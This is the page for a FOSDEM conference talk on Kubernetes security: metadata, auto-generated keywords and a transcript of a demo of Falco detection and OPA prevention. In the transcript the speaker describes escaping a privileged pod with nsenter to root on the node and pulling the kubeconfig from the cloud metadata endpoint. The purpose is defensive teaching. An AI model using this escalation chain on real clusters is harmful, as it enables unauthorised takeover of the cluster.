Fixing the Kubernetes clusterfuck
This is a modal window.
The media could not be loaded, either because the server or network failed or because the format is not supported.
Formal Metadata
Title |
| |
Subtitle |
| |
Title of Series | ||
Number of Parts | 490 | |
Author | ||
License | CC Attribution 2.0 Belgium: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor. | |
Identifiers | 10.5446/47436 (DOI) | |
Publisher | ||
Release Date | ||
Language |
Content Metadata
Subject Area | ||
Genre | ||
Abstract |
|
00:00
Information securityKernel (computing)2 (number)Multiplication signPresentation of a groupTrailPattern languageSoftware maintenanceNeuroinformatikOpen sourceOpen setProjective planeKernel (computing)HTTP cookieSlide ruleSheaf (mathematics)Point cloudLevel (video gaming)Computer animation
01:29
Hacker (term)Physical systemCausalityInformation securityGoodness of fitComplex (psychology)Open sourceArithmetic meanMultiplication signSoftware engineeringExpert systemDefault (computer science)Video gameProjective planeSoftware maintenanceWordUsabilityLevel (video gaming)Demo (music)Context awarenessHacker (term)SoftwareComputer animation
04:21
Speech synthesisComa BerenicesTwitterLink (knot theory)SpacetimeInjektivitätSlide ruleMultiplication signBoss CorporationInternetworking2 (number)Random matrixWebsite
05:09
CodeComputer-generated imageryLink (knot theory)Software repositorySampling (statistics)Slide ruleComputer animation
05:45
Control flowCodeComputer-generated imageryTime evolutionConvolutionPhysical systemOperating systemMedical imagingFile systemVirtual machineVulnerability (computing)Intrusion detection systemBit rateCloud computingDifferent (Kate Ryan album)Electronic data processingProgramming paradigmUsabilityVideo gameNetwork socketSocket-SchnittstelleGoodness of fitModule (mathematics)Information securityKernel (computing)Fundamental theorem of algebraCompass (drafting)Open setComa BerenicesInternetworkingSet (mathematics)Cartesian coordinate systemProcess (computing)Limit (category theory)CodeLevel (video gaming)SpacetimeGroup actionContext awarenessHypermediaPoint cloudNetwork topologyConvolutionImplementationGame controllerSoftware bugExt functorStreaming mediaPresentation of a groupWordSystem callOpen sourceSource codeMultiplication signInterface (computing)SoftwareEvent horizonHeat transferGame theoryChemical equationDemoscene2 (number)Thermodynamisches SystemOperator (mathematics)NeuroinformatikHypothesisBoss CorporationVector spaceLibrary (computing)Exploit (computer security)CASE <Informatik>Pattern languageLoginEvoluteProjective planeMoment (mathematics)Offenes KommunikationssystemComputer scienceQuantum mechanicsRight anglePerfect groupGreatest elementFreewareRule of inferenceGotcha <Informatik>Probability density functionCompilation albumComputer fileUniform resource locatorMathematicsStack (abstract data type)State observerPrincipal ideal domainHybrid computerTracing (software)BytecodeQuantumJava appletInformationoutputRun time (program lifecycle phase)Binary codeComputer animation
14:45
Function (mathematics)Ring (mathematics)ParsingOrder of magnitudeMereologyBitConfiguration spaceTracing (software)Web 2.0Slide ruleTouchscreenSoftware maintenanceSpacetimeData storage deviceRow (database)System callEvent horizonClient (computing)BuildingFunction (mathematics)InformationProjective planeLoginMoment (mathematics)NamespaceDigital photographySoftware bugDiagramBuffer solutionPhysical systemInformation securityGame controllerMetadataKernel (computing)Server (computing)BefehlsprozessorRadical (chemistry)Service (economics)CASE <Informatik>Machine visionDatabaseLine (geometry)Network socketThermodynamisches SystemGreatest elementHooking
18:15
Module (mathematics)Binary codeClient (computing)ConvolutionPhysical systemLine (geometry)Latent heatLogicPhysical systemModule (mathematics)PlanningKernel (computing)Open setSpherical capCodeAxiom of choiceSeries (mathematics)Projective planeBuffer solutionBinary codeEvent horizonModule (mathematics)Formal languageInformationInformation securityLibrary (computing)Source codeSoftware bugCASE <Informatik>SpacetimeRing (mathematics)Goodness of fitProduct (business)Open sourceMereologyMechanism designQuicksortSingle-precision floating-point formatImplementationScripting languageProcess (computing)ConvolutionWeb browserComplete metric spaceConfiguration spaceEndliche ModelltheorieComputer hardwareClient (computing)RoboticsComa BerenicesDot productFigurate numberKey (cryptography)UsabilityAddress spaceFirewall (computing)Moment (mathematics)Right angleState of matterDemoscene
22:34
Default (computer science)Linear subspaceNormed vector spaceBlogLocal ringKernel (computing)Tape driveDivisorEndliche ModelltheorieSystem callGastropod shellConfiguration spaceBinary fileDemo (music)RootkitDifferent (Kate Ryan album)Kernel (computing)Integrated development environmentLocal ringRollenbasierte ZugriffskontrolleLaptopNamespaceNumberModule (mathematics)Game controllerInternetworkingCubePhysical systemOcean currentRoutingMultiplication signState of matterSlide ruleVector spaceNetwork topologyProduct (business)System administratorProgram flowchart
24:51
outputRandom numberVideoconferencingControl flowVideo game consoleLoop (music)File systemSlide ruleDirectory serviceMathematicsObject (grammar)Module (mathematics)Structural loadKernel (computing)Buffer solutionPasswordComputer fileVirtual machineCore dumpComputer animationSource code
25:45
Run time (program lifecycle phase)Error messageRootkitIntelCase moddingStructural loadCore dumpBuffer solutionComputer fileElectronic mailing listRing (mathematics)Computer animation
26:20
Very-large-scale integrationVideoconferencingVideo game consoleMedianRandom numberoutputHypermediaPrinciple of maximum entropyControl flowLoop (music)Physical systemLaptopCore dumpGraphical user interfaceGroup actionIntegrated development environmentLocal ringBuffer solutionOpen setRing (mathematics)Different (Kate Ryan album)PasswordBefehlsprozessorPrimitive (album)Kernel (computing)Computer fileDirectory serviceRadical (chemistry)Mechanism designRight angleComputer animation
27:27
Directory serviceError messageRootkitComputer fileLatent class modelMechanism designComputer fileOffenes KommunikationssystemLocal ringDirectory serviceSystem callInformation securityKernel (computing)Context awarenessMoment (mathematics)Physical systemNamespaceMathematicsWeightInstance (computer science)VirtualizationMultiplication signRight angleSpacetimeRoutingParsingCartesian coordinate systemBinary fileTouch typingRootkitAliasingStapeldateiLevel (video gaming)Computer animation
29:10
Computer fileRootkitDirectory serviceError messageComputer-generated imageryDiscrete element methodIntegrated development environmentInformationMultiplication signMedical imagingDifferent (Kate Ryan album)Physical systemMetropolitan area networkData streamContext awarenessInformation securityConfiguration spaceSpacetimeBitFigurate numberMoment (mathematics)Computer fileInternetworkingFunctional (mathematics)TouchscreenElectronic mailing listNamespaceDefault (computer science)System administratorNeuroinformatikStapeldateiInstance (computer science)SoftwareDirectory serviceExistenceGodAliasingSlide ruleSpeech synthesisRoutingService (economics)Military baseBit rateComputer clusterServer (computing)AbstractionFile systemBoolean algebraMaxima and minimaComputer-assisted translationGastropod shellSource codeSoftware repositoryLocal ringRootkitSource codeComputer animation
34:04
HypermediaRootkitNP-hardIP addressFile systemNamespacePhysical systemDifferent (Kate Ryan album)Mixed realityComputer animation
35:01
Graphical user interfaceDiscrete element methodInclusion mapInformationComputer fileGastropod shellSpacetimeHeegaard splittingDefault (computer science)Video gameLoginDirectory serviceMessage passingKernel (computing)Exploit (computer security)Group actionThermodynamisches SystemPhysical systemConfiguration spaceQueue (abstract data type)TouchscreenAliasingMobile appMeta elementSet (mathematics)RootkitSystem administratorComputer-assisted translationSource codeComputer animation
38:13
Gastropod shellRootkitExecution unitInformationGastropod shellIntegrated development environmentUsabilityVideo gameRoutingWordStatement (computer science)Graph coloringLine (geometry)OrbitPhysical systemEvent horizonRow (database)LengthSoftware frameworkSoftware bugProjective planeSoftware testingTouchscreenCapability Maturity ModelCircleMetric systemBlogQuantum stateDisk read-and-write headQuicksortChemical equationProduct (business)Endliche ModelltheorieBuildingInternetworkingObject (grammar)Dependent and independent variablesHybrid computerInformation securityCASE <Informatik>Block (periodic table)Thermodynamisches SystemSystem callMereologyOffice suiteType theoryStreaming mediaIdentity managementData streamKernel (computing)outputLink (knot theory)Structural loadArithmetic meanBitRule of inferenceSoftware maintenanceStandard deviationVulnerability (computing)Source codeComputer animation
44:19
Open sourcePoint cloudFacebook
Transcript: English(auto-generated)
00:05
So, hi, my name is Chris Snova, second time here at FOSDEM presenting. I gave a talk last year, show of hands who have seen it, yep, it was a good one. We explored, well, y'all ran the track, so thank you, but we explored some anti-patterns
00:22
and some exciting things in Kubernetes. Since then, Kubernetes has grown a lot, I've grown a lot, and the entire cloud-native ecosystem has also grown tremendously. So we're going to be looking at some more concepts tonight, something that I've been thinking about and studying for about the past six months, and we're going to look at
00:41
some cloud-native computing foundation, open source tools, including Kubernetes, including the Open Policy Agent, and I'm going to try to be diligent about calling it the verbose name, Open Policy Agent, but you might hear me refer to it as OPA or OPA as well, and some other exciting tools in the ecosystem, including the Linux kernel.
01:03
So to start off, shout out to my friends over in this section who gave me some delicious cookies and chocolate before I came on stage, and also we have the two Falco maintainers here in the front that have some Falco stickers, and Francesc and Macha have some over there, so throughout the talk, if you see stickers come your way, feel free to grab one and
01:21
stick it on your laptop, and you're going to be learning more about Falco and these other projects tonight. All right, so the first thing I'm going to do is I am going to open up my slides. Okay, so this is our first slide here. So yeah, it's called Fixing the Kubernetes Clusterfuck, which I think is a funny way
01:44
of basically alluding to Kubernetes is complex, and it's complex for a good reason, and because of this complexity, it actually is a very powerful tool, which is why I've been working on it, and that's why I love it so much and why I've been so diligent about being involved with it and using it.
02:01
So in a weird way, this complexity can potentially scare folks or cause problems, but we're going to be looking at concretely some ways how the complexity, particularly around security, is something that a lot of people that I've noticed may not be necessarily an expert on. I don't even know if I would call myself an expert, but I've been studying it for
02:23
quite some time, and I'm going to share with you today everything that I've found. So yeah, I wrote a book called Cloud Native Infrastructure, which is how I got into this whole Kubernetes thing, and one of the things that I noticed in Kubernetes that hasn't really been solved is this concept of security, and what does security mean
02:43
to me? As an infrastructure engineer, it was basically like, I don't want anything happening in my system that I feel like should not be happening or that I don't know about or have visibility into, and I would like a convenient way to control that layer of security. So recently, I've become a maintainer of an open source project called Falco, and
03:04
I've been maintainers of other tools in Kubernetes and other projects I've contributed across the ecosystem for the better half of my adult life, and all of this kind of alludes to this idea that I fancy myself a hacker in the sense that I see something I don't understand, and I sit there and hack away at it until I finally understand it.
03:22
So the two words I want everyone to think about today. The first word is prevention, and the second word is detection. And we're going to really explore these two words and what they mean from a security context, and we're going to actually go through and do a live demo where we take a Kubernetes cluster set up with Kubernetes cops with the default configuration.
03:46
We're going to exploit the prevention techniques, in other words, we're going to hack into the Kubernetes cluster live on stage, and then we're going to look at how Falco was able to detect this malicious behavior, and we're going to look at how we can use what's coming out of Falco to draft policy using
04:01
preventative tactics downstream to prevent this from happening again. Hopefully, when I get done doing this, you'll walk away from here saying, as an infrastructure engineer, as a software engineer, as a general Kubernetes user, I would fancy a cluster to have both of these for a complementary, holistic approach to securing and understanding my Kubernetes system.
04:26
Okay, so everybody, this is the time where you take your phone out. Everything that I'm about to do, including these slides, including links that I'm going to reference, including talks that I think you should go see, including links to my GitHub, my Twitter. Everybody's getting their phones out now.
04:41
I'll get mine out just so that you don't feel lonely. And everything is there. So if you go to github.com slash Chris Nova slash public speaking, I'm going to do some remote command injection here by hitting the space bar. And of course, my internet's not working.
05:00
Hold on. No, it's okay. We're going to need it. I don't use the FOSM Wi-Fi, so give me like two seconds. But anyway, if you go to this website, at the very top, I changed, there it goes. I changed the title here to go to the actual, there's my iPhone. The link in the repo that has everything that I have checked out locally.
05:24
So if you want to go and follow along all of the notes, all of the markdown, everything exists here, including the samples that we're going to be going through tonight. Okay, so let's go back to my slides here.
05:51
So the first word, prevention. Words that come to mind when I look at preventing unwanted behavior are locks, right? If you want to keep somebody out, you lock the door. It's very easy, it's low hanging fruit, and most doors and
06:02
most access to our systems have a concept of a lock on it. If you look at Linux fundamentally, right? There's different ways of locking either users or applications out of what we do not want them doing in the kernel. Show of hands here, who's created a user in Linux before? Okay, everybody at FOSM just put their hand up.
06:21
Who here has written SELinux policy, set comp policy, set comp UPF policy? One person, two, three, okay, four. Okay, so again, if you go and you do some research here, you'll understand that we're preventing unwanted behavior, or at least we're attempting to, and that's kind of the lesson here.
06:40
If you did not want a user to access something on the file system, you could create a user, change the permissions. There's this whole fundamental paradigm in place that allows you to prevent people from doing things they shouldn't do. You can also do this with an application, right? So set comp BPS actually gives you a way to go through and control which system calls an application could or could not execute.
07:02
If you look at cgroups, right, in the Linux kernel, you could define arbitrary limits for what you want applications that are running within the context of the cgroup to be bound to. And if they violate this limit, the kernel's going to terminate the process. So we have these fundamental paradigms in Linux that we're all familiar with. And if you follow along in Kubernetes, you will see that Kubernetes and
07:24
cloud native ecosystem is following in the footsteps of the Linux operating system. Set comp is to Kubernetes as OPA, Open Policy Agent, is to cloud native. Or I'm sorry, set comp is to Linux as OPA is to cloud native. So that's this concept of access control, policy enforcement.
07:41
We also have this idea of image and artifact scanning, right? So in traditional ecosystems, if you wanted to deploy a new application, you might wanna go through and actually look at the byte code to see if anything in there looks suspicious. There's a well-known set of libraries that are open source on the Internet that you can go and you can actually assert your binaries against,
08:02
whether it's Java byte code or it's good old-fashioned machine byte code. And you can actually see if there's anything buried inside of that that you potentially would not want there. We have the same concept with images in a cloud native ecosystem. The same paradigm applied in a different, more distributed way. Code reviews, right? So you and your team going and looking at what the actual code does.
08:22
Is there any vulnerabilities? Are you catching your errors? Do you have exposed sockets? What happens if somebody floods the socket? Just being security minded throughout your day to day life is another big thing that I've been obsessing over. So these are all tools that you and your team can use to prevent unwanted behavior. But as we all know, bad things can still happen.
08:43
CVEs still happen, right? There's no such thing as perfectly safe and perfectly secure and perfectly perfect software, right? FreeBSD, Linux, Kubernetes, name and open source projects, Jupyter notebooks, they've all had CVEs opened up against them. They've all been exploited at one point and they've all been fixed.
09:01
But somebody had to discover this first. So this concept of detection is the scientific approach to looking at our systems from the bottom up instead of from the top down. So by taking things that we would otherwise be effectively blind to and asserting rules against them and using those signals for data processing,
09:23
we're actually able to see things in our system that we otherwise would not be able to see. And so detection is this approach to looking at our system and saying 99% of the time it behaves in this way given these input signals. But on Tuesday, last week, all of a sudden this happened and
09:43
we have never seen this before and we weren't expecting this to happen. And we can programmatically assert that there was, we would call this an anomaly, that there was an anomaly that happened in our system. And that is where detection comes into play. So some people use tools like observability to do this, right?
10:00
So whether we're auditing cloud infrastructure, or the application itself, or the Linux kernel that you're running on, or the Kubernetes audit logs, we basically just wanna have visibility into our system with high cardinality across the whole stack. We also look at things like intrusion detection, right? There's been a couple of exploits over the past year where folks have found out
10:24
that people scan images, so people scan PDFs. And if you upload an image with thousands of URLs buried inside of it, or a PDF with thousands of images buried inside of it, you can effectively doff someone unintentionally or intentionally. So there are ways of getting things into a secure system, and
10:41
you may not be aware of a certain vector. So security is this whole concept of studying these attack patterns and the humanistic approach to how somebody might think of being intrusive in your systems, and so I've done that with Kubernetes. And I think the approach to preventing this from happening, to securing this,
11:02
and detecting something that is malicious that could be going on, is this word that I have been using that I would like to start advertising, pull requests accepted if you don't like it, called runtime security. That is a hybrid of both. The practice of using something like Kubernetes access control or
11:21
policy enforcement to prevent unwanted behavior, but also understanding that in some cases that might not be enough. So we can begin to use tools like observability tooling, like Falco, what you're gonna see in a moment, to actually audit the kernel and understand what's happening in our system. And I believe that having both of these creates a set of checks and
11:42
balances where an operator or an infrastructure engineer could go in and not only prevent unwanted behavior, but detect it. And then after they've detected it, go through and create new policy to prevent it from happening again. And I think this is a complementary approach to understanding our systems and to securing our systems moving forward.
12:02
Okay, so I'll give you the 30 second pitch on Falco. Don't worry, we're gonna compile it and actually run it so you'll be able to see concretely what it does. It's a CNCF incubation project. Who here has ran Wireshark before? Okay, I really wish we could have seen that, but
12:20
everybody in this giant auditorium just put their hand up. So Loris Dejani, my boss, the founder of the company I work for, Sysdig, was one of the original creators of Wireshark. He has his PhD in Linux. And his original thesis to solving this problem of understanding our systems was that TCP is the fundamental packet of truth, right? It's the atom, it's the quark,
12:41
if you're into quantum mechanics, of how we understand computer science. As we moved into cloud native, as we moved into computers, we realized that the network isn't necessarily the ultimate source of truth anymore. What we did is we started to look at kernel tracing. Who here is familiar with kernel tracing? Okay, so maybe a third of the room just put their hand up.
13:01
They all put his hand up. And there are a couple avenues for how you would potentially trace events in the kernel. But the idea here is that if all software ultimately flows through the system calls in the Linux API interface, by auditing these system calls at runtime, we should be able to understand exactly what's going on in the system and gain otherwise unavailable information about what potentially is happening.
13:25
So this is where this whole observability thing comes into play. So Falco has taken this enormous onslaught of data from the kernel globally. So if you use something like ptrace, I mean by definition p stands for process, it's concretely married to a process itself with a PID.
13:42
What Falco and what the Sysdig CLI tool does is it has some libraries that allow you to go through and globally audit what's happening in your kernel. The two ways we do this is by either running a kernel module or by using a newer technology called eBPF that allows us to implement
14:00
kernel tracing in user space so that we can understand what's going on in the kernel. What Falco does is it takes this stream of data, these signals from Linux, and it asserts them against well-known anomalies, right? What happens if somebody executes open, the open system call, against etc shadow? Do you and your team wanna know about that?
14:21
I probably would. And if you're savvy, I got to use the word savvy in my presentation, if you're a savvy Linux user, you could probably find ways of doing this on a system with the system and user space not being aware that you did this. But the kernel ultimately would have to execute the system call. So by going to the kernel level,
14:41
you're able to see things you would otherwise be blind to. So again, it's an evolution of Wireshark but for the kernel, and this allows us to begin kernel tracing. So how does it work? So Falco takes not only information from the kernel, but also other bits of information from a containerized system as well.
15:00
And we're just using what's going on in the kernel to tell a broader story about how we would potentially be detecting anomalies in Kubernetes. I like how people are taking photos of my very professional ASCII diagram on the screen here. I mean, come on, I went through and actually centered this with spaces and counted the spaces. This took at least 20 or 30 minutes.
15:23
So on the left side here, we have system call events is what I basically just described. We also can parse other bits of meta information from our systems as well. Who here has ever explored the Docker socket? And another third or so of the people here. If you can actually go and connect to the socket, you can actually get all kinds
15:42
of interesting meta information about the containers that are running on the system. Kubernetes also gives us some visibility as well. We have Kubernetes meta information. What is the name of the pod? When was it started? How long has it been running? What namespace is the pod running in? And we also have this new feature in Kubernetes called Kubernetes audit
16:02
logs that basically give you the who, what, why, and where of something happening, of some mutation in your infrastructure in your system. So if you ever go and follow the tutorial online and blindly download a YAML manifest and apply it to a cluster and just kind of hope it works, which we've all done before, I'm sure, what's actually happening is you're
16:22
mutating the data store in Kubernetes and then all these little controllers come out and they go and they try to reconcile this new configuration that you've pushed to your cluster. And if you're lucky, it should work. So by having the central database, we're able to tell an even broader story about what's happening in our system. So all of this data comes into Falco, which is written in C++ and
16:44
it's highly optimized for efficiency here. I mean, we're dealing on the order of magnitude of millions of system calls, potentially a second, coming up from the kernel. And how it comes up from the kernel is over a ring buffer. And Lorenzo Fontana, probably the most technical maintainer on the Falco project sitting in the front row here, that's an inside joke of ours.
17:03
He gave a wonderful talk earlier today about eBPF. He literally wrote the book on BPF. There's, and that, the slide I asked you to take a picture of, you can go watch his talk. And he goes into much more detail here. But basically, we have a 16 megabyte ring buffer per CPU running on our system.
17:20
I'll show you concretely in a moment what that looks like. And we're able to pull these system calls up through that, combine that with Kubernetes information, combine that with the container information, and then assert this against well-known security anomalies. Once an anomaly is detected, there's a few things Falco allows us to do.
17:40
Fundamentally, Falco is designed to be composable, so you can take an output from it and you can plug it into anything you want. The first one we see on the screen is GRPC. This is relevant because this has allowed us, using tools like Protobuf, to easily build clients and SDKs for you to plug Falco outputs into other arbitrary parts of your system. Right now we have Rust, Go, Python, and
18:02
if you would like to generate your own, pull requests are accepted. We also have a concept of a webhook, of actually going out and trying to send data to a configured web server. And in this example that I'm gonna be running today, good old standard out, which we're just gonna look at in the terminal here. So again, to summarize, from the bottom up, we have the Linux kernel.
18:25
On top of the kernel, we have either a kernel module, which we'll go more into what that looks like in a moment, or an EVPF probe. Then we go into our ring buffer that basically runs on that thin layer between the kernel and the rest of user space, and we move up into user space where
18:41
we have two libraries that are able to pull information from the ring buffer. And then ultimately, Falco is built on top of all of these libraries, and allow us to interface with Kubernetes and Docker, and actually tell a full holistic security story. So to summarize, Falco is a static binary.
19:02
You can run it potentially in a container. It's written in both C and C++. We have Rust, Go, and Python clients, and this whole thing has been optimized for speed. GitHub.com slash Falco security if you wanna see more. So let's talk about the kernel module. So what this does is this parses system events.
19:23
So kernel modules were our first approach at how we would go about configuring custom logic in the kernel. There's a fundamental problem with this, which is if you're running a potentially unknown kernel configuration, or if something happens on your hardware, or something that you didn't plan for happens in your kernel module, you can potentially crash a system.
19:42
Furthermore, imagine me, a security engineer, walking into a company and saying, hi, download our kernel module from the Internet and install it in production. We promise that's gonna be a good idea. So this problem is why eBPF is so successful.
20:01
eBPF says, we're gonna take the BPF, Berkeley Packet Filter, and we're gonna go a step further, and we're gonna start to build more logic and more capabilities into this very old, otherwise relatively unused part of the Linux kernel. And what we're gonna do is we're gonna guarantee a few things. And particularly, we're gonna solve this kernel module problem of, if you want to do certain things,
20:21
we're gonna prevent you from being able to crash a system. So we started to play with eBPF. So we wanted this to do the same thing that our kernel module was doing. We wanted to parse these system calls because we have found that this is actually a good source of truth for doing things like detecting anomalies. And we also wanted to make sure that we couldn't potentially crash a system.
20:42
So because eBPF code is already pre-compiled into the kernel, you're effectively just telling the kernel to turn it on, right? It's just like JavaScript running in your browser. It's just saying, you already have this logic, just please do this one thing for me instead of please run this logic I wrote myself. So BPF, or eBPF rather, it's unable to crash the kernel.
21:02
It's effectively read-only, and it's not Turing-complete. But you're still able to do some pretty powerful things with it. And then once you get it from the kernel, you can implement that in a Turing-complete language of your choice. So if you wanna look more, go to the open source project and check out scap.c and scapBPF.c.
21:21
Who here remembers Wireshark cap files? Same concept, but with BPF and for the Linux kernel. So earlier today, I met with a guy, Gress, if he's here. Thank you for helping me out earlier. And he helped me get OPA, or Open Policy Agent, set up for my demo. And we're gonna actually hack into Kubernetes, and
21:41
then we're gonna go through and use this to prevent my hack from happening again, and we're gonna run a series of experiments here. So more on OPA in a moment, but basically it's a CNCF project, just like Falco, and it works with more than just Kubernetes. So it doesn't have to work for Kubernetes, although in this example we're using it. And it was designed to basically just solve the problem of creating
22:03
a policy engine that we could implement anywhere. So one policy engine to rule them all is basically what I think of when I think of OPA. Gatekeeper, an open source tool, is an implementation of this broader policy enforcement mechanism. And Gatekeeper is specifically coupled with Kubernetes, and
22:22
that's what we have running in my cluster. So if you wanna run something like OPA or OPA in Kubernetes, Gatekeeper has sort of taken this existing, more flexible, more modular project and optimized it for the single concrete use case of Kubernetes. Okay, so let's talk about my demo.
22:41
Looks like we are 25 minutes into my talk, so I'll probably do another 10 or 15 minutes here of this demo, and I'm gonna go pretty fast. So I'm gonna leave some questions at the end, so if something doesn't make sense or if I skip over something, please either ask me afterwards so I can document it on the Internet. I'm sure you're not the only one who had this question, or
23:01
even put your hand up at the end, and I'm happy to answer quickly at the end of the demo. But what we're gonna do is we're gonna start off by showing you how we're doing some kernel tracing on my local laptop here. So I'm running Arch Linux, I have a fairly old kernel, not too old, but also not brand new to kind of demonstrate what I would think most people are running in production.
23:21
And we're gonna create a user local bin FOSDEM on a couple of different environments. The first one on my local laptop, and we're going to parse this using the kernel module. And you're gonna see the devices, and you're gonna actually watch me load the kernel module on my laptop. The next one, we're gonna start Falco with BPF, and I'm gonna delete the kernel module, and you'll see the devices go away.
23:42
And you'll see Falco still working dynamically, which is exciting because we didn't have to load anything into the kernel. Next, we're gonna do this in Kubernetes again. And we're gonna do this by, we're gonna have a cluster administrator, cube config configured, which is basically like root on my Kubernetes cluster.
24:01
And then I'm going to use Kubernetes access control and prevention techniques, RBAC, to create a new configuration that only gives me access to one namespace in Kubernetes. I'm then going to create a shell in Kubernetes, privilege escalate through that shell, gain access to the underlying node,
24:20
get root access, all of which that should have been reasonably prevented, given Kubernetes RBAC. After we do this, and I've hopefully sufficiently scared a number of people in the room here. We're going to go through and we're gonna look at the OPA policy and the gatekeeper policy of preventing this from happening again.
24:40
And we're gonna look at how Falco, the whole time, had every system call and was able to tell a story about what happened. And basically explained the threat model and the attack factor for what was happening in Kubernetes. Okay, so done with my slides. So the first thing I'm gonna do is I am going to show you my slash
25:04
dev on my file system here, can everybody see okay? Cool, change directory slash dev. You can see here, we're looking for Falco down here in these devices. And if you notice, you don't see them. So next, I'm gonna go to this directory in home here.
25:23
And you're gonna see I have two pre-compiled objects here. One of which is a kernel object that we're gonna load as a kernel module. And the other one is just a regular old ELF object. And we're gonna use both of these subjectively as we start running Falco. And so, what I wanna do is I'm gonna just run pseudo Falco and
25:43
we'll see what happens. Let me enter my password here. And you can see here we got an error, unable to open device falco.0. Remember earlier I mentioned a 16 megabyte buffer per core. I have eight cores on this machine, so we're looking for zero through seven, right, zero index, device files that do not exist.
26:02
So, what we're gonna do is we're gonna insmod falcoprobe.ko. And if I list mod and we'll grep for Falco, you can see it's loaded.
26:22
And if I list slash dev again, you can see here, we now have Linux devices for every one of my CPU cores. So now, we have something that's coming from the kernel. And this ring buffer is iterating around and around over itself in 16 megabyte increments, and nothing is pulling from it. So we start from Falco, and now we're actually able to gain data.
26:44
So Falco is doing nothing, right? Nothing's happening on my system. I'm running a pretty primitive system here. I have an IDE and a couple of folders open from when I plugged my phone into my laptop. But even if I had Chrome running right now, you would see some set GIDs and
27:00
you would see Falco starting to alert us that something was happening. So for our first experiment, in a different terminal, sudo, or actually we'll do this without sudo first. User local ben fosdem. Permission denied. Linux is using preventative action to keep us from doing something that we
27:20
shouldn't be doing. We escalate to a user. We happen to know the password. We're able to create the file. Falco alerts us. Pretty simple alerting mechanism here. And you can see here that because this was a well-known directory, I'm sure most people in the room here is familiar with user local ben or user ben, as well as maybe some other files on the system,
27:41
such as slash proc or slash dev. There's a lot of things that you would potentially want to know about if somebody's executing open system calls on some of these directories or on some of these files. Perhaps PID1 would be of interest for some folks. So we're able to take this a step further. So we're gonna keep Falco running, and I'm gonna get some space in here so
28:01
you can see the alert as it comes. And this time, I'm gonna run a Docker container locally, and we're gonna perform the same experiment. And I want you to see how the Linux kernel treats a containerized instance versus a local instance, because this is the fundamental technology that empowers all of the security parsing that we're doing. So I'm going to Docker run IT.
28:22
I have what I call my hack container. But basically, this is a container that just has netcat and in map and some batch aliases and a lot of goodies that I use to explore Kubernetes. And I just push this whenever I make a change to it. So I'm gonna run this locally. You can see here I've got two commands that might be interesting to you that
28:42
we're gonna use in a moment when we run in Kubernetes. And you can see I'm root here on my system. If we uname minus a, you can see I'm running Manjaro Linux kernel 4.19, and this is the kernel on my system, right? This isn't some newly invented magical virtual kernel or anything.
29:01
This is just the application running in the context of cgroups and namespaces interfacing with my existing kernel. So, touch user local bin FOSDEM, you can see here. Except for this time, if you look at the end, you can see we're able to get information from the Docker context. We're able to get the name of the image that executed this command,
29:22
as well as the image ID. So, Falco starts to pull information from our system as things happen at different layers. And if it's running locally, we're able to audit it. But if it's running in a container, we're able to get even more information from the data streams that exist in a containerized environment. Okay, so let's do this in Kubernetes.
29:43
So, I'm gonna go back to my public speaking repo here. Slides, clusterfuck, cool. And I'm going to alias k is equal to kubectl.
30:00
I'm going to k get pods. So, gosh, FOSDEM, Wi-Fi, come on. There we go, no resources found. I'll try to keep the Internet to a minimum here as we wrap up my talk. But you can see there's nothing running in the default namespaces. And I'm gonna use namespaces as a way to demonstrate that I do in fact have global privileges on this Kubernetes cluster on this system.
30:26
So, I'm going to list namespaces. So, I get namespaces, and you can see here I have Falco in the Falco namespace, Gatekeeper and Gatekeeper system all installed. So, if I go to my config directory, .cube, .config, sorry, .cube, and listing here,
30:46
you can see I have config, config admin, and config default. Admin is the one I'm using now, but if we copy config default over here, it's still gonna be interacting with the same Kubernetes cluster,
31:01
except this time we're gonna be using a different service account, which means this user that I'm now running as should not have access to these namespaces. And the simple trick here is we should not be able to list namespaces. So, k get namespaces, and you're gonna notice and see that the Kubernetes API server rejected this request.
31:21
It's preventing us from doing something it doesn't want us to do. But, as a savvy computer user, we understand that there may or may not be ways around this. So, let's go now, still as my default user, without access to the rest of the namespaces in my cluster, we can list pods, and we can list pods in the default namespace fine,
31:42
but if we tried to list pods in a different namespace, we happen to know Falco exists, you'll see again that it's going to get rejected. So, here in my clusterfuck-fosdom 2020 directory, I have a small bash function called shell. And you go in here and you can see that we have some very interesting
32:03
configuration bits defined, as well as that original Kubernetes cluster container image that I ran moments ago on my local laptop, and we're gonna run this in Kubernetes. There's a few bits of configuration here that we're gonna prevent from happening again using a tool like OPA, which is this very lovely
32:22
security context privileged equals true. So, Kubernetes is an abstraction, right? And because of this abstraction, you may not quite understand truly what's going on as you go down to the internal layers of the system that's running Kubernetes. And basically what's happening here is that we're able to go through
32:41
and escalate privileges and exploit this cluster. So, I have five minutes left, and then we have 10 minutes for questions. So, I'm gonna go pretty quick here. So, what we're gonna do is we're gonna run this function shell. First, we're gonna source it. Now, we're gonna run shell. And so, what this is doing is it's basically creating a TTY
33:00
in my container image running in Kubernetes, and here I am. I'm root at shell. As the user in the container, I can do a list, and you can see that I'm in the root file system of my Linux system. But if I cat out etsymotd, you're gonna see there's two commands here
33:20
that we're gonna use. Because privilege is equal to true, I'm able to go through, and I'm able to jump into the PID1 namespace as well as the mount, the user, and the network namespaces, and I'm able to basically build a TTY through this, such as this.
33:43
So now, I'm actually gonna do this with bash at the end, sorry. Bin bash. Now, you can see I'm IP at 172.20.35.32, which if you've ever run an EC2 instance before, you'll know that this looks like a default VPC Amazon instance ID.
34:04
And if I list where I am, you can see now, I am actually on a different file system than I was before because I escalated to the mount namespace that the container had access to using nsenter. To give you an example of where I am and what's going on, I'm gonna do a docker list, sorry, docker ps,
34:29
and you can see all the containers running in Kubernetes as the user of the Linux system that Kubernetes is running on top of. In Amazon Linux, there is a well-known IP address
34:40
that looks like this. Thanks, I'm just gonna do this so I can copy it. Sorry, I'm trying to go fast here. Oh, thanks, I know, I know. Cat, edc, motd, sorry, Fosdom Wi-Fi is hard.
35:03
We're gonna run our nsenter again, run our curl, and then we're gonna actually build this request. We're gonna go to the 2019 API, 10.01. You see here we have user space. This is where things are about to get exciting.
35:21
Did I spell this wrong? I hear a lot of mumbling, but I can't understand. Data, user, oh, user data, thank you. All right, there we go. So if we scroll up, this is the configuration file that cops used to bootstrap Kubernetes. As I get this from the Amazon meta information,
35:41
I come in here and I can actually see that this was hard-coded on the system, and we have not only privilege equals true, so we're gonna do a grep for minus i priv, but we can actually get minus i config, and you can see that I was able to get the kubeconfig pass on the system
36:01
